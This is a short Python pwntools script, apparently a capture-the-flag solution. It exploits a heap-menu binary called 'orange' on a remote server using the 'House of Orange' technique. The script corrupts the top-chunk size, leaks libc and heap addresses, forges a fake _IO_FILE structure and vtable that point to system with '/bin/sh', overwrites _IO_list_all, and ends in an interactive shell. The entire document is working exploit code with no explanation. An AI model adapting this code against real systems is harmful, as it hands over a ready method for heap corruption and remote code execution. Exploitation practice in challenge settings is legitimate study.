from pwn import *
#s = process("./orange")
s = remote("kshgroup.kr",1216)
elf = ELF('./orange')
libc = ELF("./libc")
def read(size,content):
s.recvuntil(">> ")
s.sendline('1')
s.recvuntil("Size: ")
s.sendline(str(size))
s.recvuntil(">> ")
s.sendline(content)
def re_read(index,content):
s.recvuntil(">> ")
s.sendline('2')
s.recvuntil("Index: ")
s.sendline(str(index))
s.recvuntil(">> ")
s.sendline(content)
def write(index):
s.recvuntil(">> ")
s.sendline("3")
s.recvuntil("Index: ")
s.sendline(str(index))
#gdb.attach(s)
read(24,"A"*24)
re_read(0,"B"*24+p64(0xfe1))
read(4096,"C"*8)
read(1024,"D"*8)
write(2)
s.recvuntil("D"*8)
leak = u64(s.recv(6)+"\x00\x00")
print "leak : " + hex(leak)
libc_base = leak - 0x3c510a
print "libc_base : " + hex(libc_base)
s.recv(2)
heap = u64(s.recv(6)+"\x00\x00")
heap = heap - 0x20
print "heap : " + hex(heap)
system = libc_base + libc.symbols['system']
main_arena = leak - 1514
print "system : " + hex(system)
print "main-arena : " + hex(main_arena)
io_list_all = libc_base + 0x3c5520
print "io_list_all : " + hex(io_list_all)
io_file = "/bin/sh\x00"
io_file += p64(0x61)
io_file += p64(0)
io_file += p64(io_list_all - 0x10)
io_file += p64(0)
io_file += p64(1)
io_file = io_file.ljust(0xc0,"\x00")
io_file += p64(0)
io_file = io_file.ljust(0xd8,"\x00")
io_file += p64(heap+0x510) #fake
io_jump = "\x00"*0x18
io_jump += p64(system)
pay = "A"*0x400
pay += io_file
pay += io_jump
re_read(2,pay)
s.interactive()
